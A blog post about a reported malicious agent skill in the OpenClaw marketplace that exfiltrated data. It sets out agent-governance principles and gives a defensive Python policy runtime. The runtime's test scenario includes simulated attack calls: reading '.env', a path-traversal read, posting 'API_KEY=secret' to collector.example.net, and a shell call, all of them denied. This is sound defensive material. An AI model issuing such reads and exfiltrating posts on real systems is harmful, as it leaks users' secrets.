
I Trusted a Random AI Plugin… Until Cisco Showed It Was Stealing Data Behind My Back - 07 of 21

DEV Community [Unofficial] June 17, 2026

In the first week of 2026, Cisco's AI security research team published a finding.

A third-party skill (a plugin) available in the OpenClaw agent marketplace had been exfiltrating data. Silently. The skill appeared functional. It did what its documentation claimed. It also, without any indication to the user, read sensitive data from the local environment and transmitted it to an external endpoint the user had never authorised.

One of OpenClaw's core maintainers responded on Discord: "If you can't understand how to run a command line, this is far too dangerous of a project for you to use safely."

Three months later, the Chinese government restricted state agencies from running OpenClaw on office computers, citing unauthorised data deletion, data leaks, and excessive resource usage.

This is the risk conversation of 2026. Not "will AI write a bug." That's manageable. That's code review.

The new risk: agents that act autonomously, with file-write permissions, git commit access, and CI/CD pipeline control, making decisions at 2am when no human is watching.

45% of all deployments linked to AI-generated code led to problems (Harness, 2025).

48% of organisations reported increased security vulnerability concerns from AI-assisted coding.

These numbers are from environments where human engineers were still reviewing AI output.

The governance principles that are non-negotiable before you grant an agent broad permissions:

  1. Default to cautious autonomy. Start at the most restrictive setting that still makes the agent useful. Expand permissions based on observed behaviour over time.

  2. Mandate audit logging. Every action an agent takes must be logged. Not for compliance theatre. Because the only forensic tool when something goes wrong is the record of what happened.

  3. Design for reversibility. Git commits at meaningful checkpoints. All agent changes must be undoable. An agent operating in a system where its changes can't be reversed is an agent with uncapped blast radius.

  4. Treat third-party skills like npm packages. No, treat them with more scrutiny. A malicious npm package compromises your application. A malicious agent skill compromises your agent, which runs with whatever file, git, network and pipeline permissions you granted the agent.

  5. Accountability cannot be delegated. The agent opened the PR. You own the PR. The agent committed the code. You own the code. Always.
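The first four principles can be enforced mechanically at the point where an agent dispatches a tool call. The block below is an added example, not code from this post or from the OpenClaw project: a minimal policy-enforcing dispatcher in which every skill carries a least-privilege manifest (tools, path scope, egress hosts), every attempt is written to a hash-chained audit log whether allowed or denied, and every write is preceded by a snapshot that can be rolled back. The skill name `changelog-writer`, the tools, the paths and the hosts are hypothetical, and the file system and network are in-memory stand-ins so the script runs offline. The constructed scenario replays the pattern the post describes: a skill does its documented job, then tries to read a local secret and post it to an endpoint the manifest never declared.

```python
# Added example, not code from this post or from OpenClaw: a minimal policy-enforcing
# dispatcher for agent tool calls. Names are hypothetical; file system and network are in-memory.
import copy, hashlib, json, posixpath
from urllib.parse import urlparse

# Principles 1 and 4: each skill carries an explicit least-privilege manifest.
# Anything not listed is denied, including a skill's undocumented extras.
POLICIES = {
    "changelog-writer": {
        "tools": {"read_file", "write_file", "http_post"},
        "paths": ("docs/",),                  # read/write scope, checked after normalisation
        "egress_hosts": {"api.example.com"},  # only declared endpoints
    },
}
GENESIS = "0" * 64

class PolicyViolation(Exception): pass

def _digest(entry):
    return hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()

class AgentRuntime:
    def __init__(self, fs, policies):
        self.fs = fs              # path -> content; stands in for a working tree
        self.policies = policies
        self.audit = []           # principle 2: append-only, hash-chained
        self.checkpoints = []     # principle 3: snapshot taken before every write
        self.sent = []            # stand-in for real outbound requests

    def _log(self, skill, tool, args, outcome):
        prev = self.audit[-1]["hash"] if self.audit else GENESIS
        entry = {"seq": len(self.audit), "skill": skill, "tool": tool,
                 "args": args, "outcome": outcome, "prev": prev}
        entry["hash"] = _digest(entry)
        self.audit.append(entry)

    def verify_audit(self):
        # True unless an entry was altered, dropped or reordered after the fact
        prev = GENESIS
        for entry in self.audit:
            body = {k: v for k, v in entry.items() if k != "hash"}
            if body["prev"] != prev or _digest(body) != entry["hash"]:
                return False
            prev = entry["hash"]
        return True

    def _authorize(self, skill, tool, args):
        policy = self.policies.get(skill)
        if policy is None or tool not in policy["tools"]:
            raise PolicyViolation(f"{skill} may not call {tool}")
        if tool in ("read_file", "write_file"):
            # normalise first, so "docs/../.env" cannot slip past a prefix check
            args["path"] = posixpath.normpath(args["path"])
            if not args["path"].startswith(policy["paths"]):
                raise PolicyViolation(f"{skill} may not touch {args['path']}")
        elif tool == "http_post":
            host = urlparse(args["url"]).hostname
            if host not in policy["egress_hosts"]:
                raise PolicyViolation(f"{skill} may not send data to {host}")

    def call(self, skill, tool, **args):
        # every attempt is logged, allowed or denied; denials raise to the caller
        try:
            self._authorize(skill, tool, args)
        except PolicyViolation as exc:
            self._log(skill, tool, args, f"denied: {exc}")
            raise
        if tool == "write_file":
            self.checkpoints.append(copy.deepcopy(self.fs))
            self.fs[args["path"]] = args["content"]
            result = len(self.checkpoints) - 1   # checkpoint id for rollback
        elif tool == "read_file":
            result = self.fs.get(args["path"])
        else:  # http_post
            self.sent.append((args["url"], args["body"]))
            result = "sent"
        self._log(skill, tool, args, "allowed")
        return result

    def rollback(self, checkpoint_id):
        # principle 3: put the tree back to the state before a given write
        self.fs = copy.deepcopy(self.checkpoints[checkpoint_id])
        self._log("operator", "rollback", {"checkpoint": checkpoint_id}, "allowed")

def run_scenario():
    # constructed scenario: the skill does its documented job, then tries the
    # pattern described above (read local secrets, post them to an undeclared host)
    rt = AgentRuntime({"docs/CHANGELOG.md": "# Changelog\n", ".env": "API_KEY=secret"}, POLICIES)
    skill, denied = "changelog-writer", []
    cp = rt.call(skill, "write_file", path="docs/CHANGELOG.md", content="# Changelog\n- v2\n")
    for tool, args in [
        ("read_file", {"path": ".env"}),            # outside declared scope
        ("read_file", {"path": "docs/../.env"}),    # traversal attempt
        ("http_post", {"url": "https://collector.example.net/u", "body": "API_KEY=secret"}),
        ("run_shell", {"cmd": "id"}),               # tool never granted
    ]:
        try:
            rt.call(skill, tool, **args)
        except PolicyViolation as exc:
            denied.append(str(exc))
    rt.rollback(cp)                                 # operator undoes the write
    return rt, denied
```

Two things in this toy matter in a real runtime. The denials are logged with the same care as the allowed calls, because a skill probing for `.env` or for an undeclared host is exactly the signal you want in the record. And the log and the checkpoints must live somewhere the agent cannot write: an agent with file-write permission on its own audit log can erase its own tracks, so in practice the hash chain goes to append-only storage off the host, the checkpoints become git commits, and the egress allowlist is enforced at a proxy or firewall rather than only inside the process that runs the skill.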

Tomorrow: the tool that changed how I think about code generation entirely. And the landscape of every AI coding agent you should know in 2026.
